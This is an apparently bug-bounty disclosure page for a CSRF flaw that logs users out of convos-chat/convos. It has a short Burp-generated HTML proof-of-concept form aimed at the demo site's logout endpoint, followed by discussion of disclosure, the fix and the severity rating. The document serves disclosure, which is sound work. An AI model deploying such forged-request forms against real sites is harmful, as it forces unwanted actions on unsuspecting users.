Cross-Site Request Forgery (CSRF) in convos-chat/convos

Valid

Reported on

Dec 11th 2021


Description

An attacker is able to log out a user if a logged-in user visits the attacker's website.

Proof of Concept

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://demo.convos.chat/logout">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Impact

This vulnerability is capable of forcing users into an unintentional logout.

More Detail

One way GET could be abused here is that a person (a competitor, perhaps) places an image tag with src="<your logout link>" anywhere on the internet, and if a user of your site stumbles upon that page, they will be unknowingly logged out. This is why it should be a POST with a CSRF token.

Note

While this cannot harm a user's account, it can be a great annoyance and is a valid CSRF.

We are processing your report and will contact the convos-chat/convos team within 24 hours. a year ago
Devendra Bhatla
a year ago

Researcher


@admin Please contact the maintainer at contact@convos.chat.

We created a GitHub Issue asking the maintainers to create a SECURITY.md a year ago
Jamie Slome
a year ago

Admin


@dev696 - I have commented on the GitHub Issue! I have shared the report URL with them if they want to view the report directly. Otherwise, once they have added an e-mail to the SECURITY.md, they will receive a magic link to access the page.

Devendra Bhatla
a year ago

Researcher


@Jamie, I believe we can consider the shared email "contact@convos.chat". You can share all the details, as this is the main contact. Also, the URL is private and cannot be viewed. Thanks for your support as always.

We have contacted a member of the convos-chat/convos team and are waiting to hear back a year ago
Jamie Slome
a year ago

Admin


Sorted! 🎊

A convos-chat/convos maintainer validated this vulnerability a year ago
Devendra Bhatla has been awarded the disclosure bounty
The fix bounty is now up for grabs
A convos-chat/convos maintainer marked this as fixed in 6.40 with commit a2d265 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
ChatSidebar.svelte#L233 has been validated
A convos-chat/convos maintainer
a year ago

Maintainer


Thanks for reporting this through e-mail, instead of posting it online before having a chance to fix it.

I did consider this a minor issue. I think even bigger sites like Google also do not protect the /logout endpoint. Nevertheless, the fix was simple to add, so why not? :)

KhanhCM
a year ago

Hey @dev696,

A real researcher will not just copy all the content from other reports. You should try to write your reports by yourself.

Furthermore, the severity for this vulnerability is not High, it's Medium (CVSS from 4.3 to 6.5, maybe). You can check it on some reports or CVEs. Convos's users will be shocked if they learn that their app has a High vulnerability when the impact is just logging out a user, with no effect on the account, just an annoyance!
